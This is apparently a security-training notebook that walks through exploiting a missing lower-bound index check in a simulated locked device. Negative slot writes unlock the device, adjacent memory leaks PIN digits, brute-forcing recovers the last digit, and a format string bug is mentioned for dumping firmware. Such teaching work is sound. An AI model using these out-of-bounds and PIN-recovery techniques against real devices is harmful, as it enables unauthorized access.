<a href="https://colab.research.google.com/github/Jubicod/wsf/blob/main/tutorial1/c_lower_bound.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# Exploiting the **lower bound** bug


In [ ]:
!git clone https://github.com/Jubicod/wsf.git
%run wsf/tutorial1/install.ipynb

In [24]:
app = App()
app.send('S')

ready...
S
device locked
0  RW-L
1  RW-L
2  RW-L
3  R--L
4  R-IL
5  RW--
6  R---
7  ----
ok


424

In [6]:
# read and write commands require the slot index to be between 0 and 7
# what happens if we pass a higher index ?
app.send_read_slot(8)
app.send_read_slot(9)
app.send_read_slot(10)
app.send_read_slot(11)
app.send_write_slot(8,55)
app.send_write_slot(9,55)
app.send_write_slot(10,55)
app.send_write_slot(11,55)

r8
error
r9
error
r:
error
r;
error
w855
error
w955
error
w:55
error
w;55
error


In [8]:
# seems there is a higher bound check (could confirm by checking all possible slots)
# is there a lower one ? let's try negative slots
app.send_read_slot(-1)
app.send_read_slot(-2)
app.send_read_slot(-3)
app.send_read_slot(-4)
app.send_write_slot(-1,55)
app.send_write_slot(-2,55)
app.send_write_slot(-3,55)
app.send_write_slot(-4,55)

r/
error
r.
error
r-
1
ok
r,
error
w/55
error
w.55
error
w-55
ok
w,55
error


In [2]:
# interesting, seems -3 is authorized both for writing and reading
# seems a lower bound check is missing
# can we exploit it ? let's have a closer look at slot -3

# let's see its value after power up
app = App()
app.send_read_slot(-3)

ready...
r-
1
ok


In [3]:
# value is 1. maybe it's a boolean. let's write 0 in it and check status
app.send_write_slot(-3, 0)
app.send('S')
# we unlocked the device !!! seems this boolean was holding the locking state !

w-0
ok
S
device unlocked
0  RW-L
1  RW-L
2  RW-L
3  R--L
4  R-IL
5  RW--
6  R---
7  ----
ok


242

# White box hacking
the format string bug allows to dump and reverse the firmware and the slots

Looking at binary (or source code) you can see reverse the structure of the slots:

```
struct slot_s
{
	unsigned char value;
	unsigned char access; /* 1 for READ, 2 for WRITE, 4 for INCREMENT, 8 for UNLOCKED */
};

struct info_s
{
  char           locked;
  char           error; / set to 0xFF before starting */
  unsigned char password[4];
  struct slot_s slot[MAX_SLOT];
};
```

the memory looks like that
* locked ...... slot -3 value
* error ........ slot -3 rights
---
* PIN #1 ....... slot -2 value
* PIN #2 ....... slot -2 rights
---
* PIN #3 ....... slot -1 value
* PIN #4 ....... slot -1 rights
---
* slot0  ....... slot 0   value
*                slot 0   rights
---
...

let's try to get the PIN code (in case it has been changed from the one in the code)


In [7]:
app = App()
app.send_write_slot(-3,0) # unlock
print("slot -1 ----------------")
app.send_read_slot(-1)
app.send_write_slot(-1,0)
app.send_increment_slot(-1)
print("slot -2 ----------------")
app.send_read_slot(-2)
app.send_write_slot(-2,0)
app.send_increment_slot(-2)

ready...
w-0
ok
slot -1 ----------------
r/
error
w/0
error
i/
ok
slot -2 ----------------
r.
50
ok
w.0
ok
i.
error


In [5]:
# slot -1 is not writable, not readable, but can be incremented, so it's access right least significant 3 bits are 1,0, and 0 (4). PIN#4 ends with 4, since it's an ascii digit it is probably "4"
# slot -2 is writable, readable, but not incrementable, so access right last 3 bits are 0,1 and 1 (3). PIN#2 is probably "2"
# PIN#1 is directly readable in slot -2 (50 -> "2")
# so only PIN#3 is missing, but it easy to recover by bruteforcing since we have the others 3 PIN digit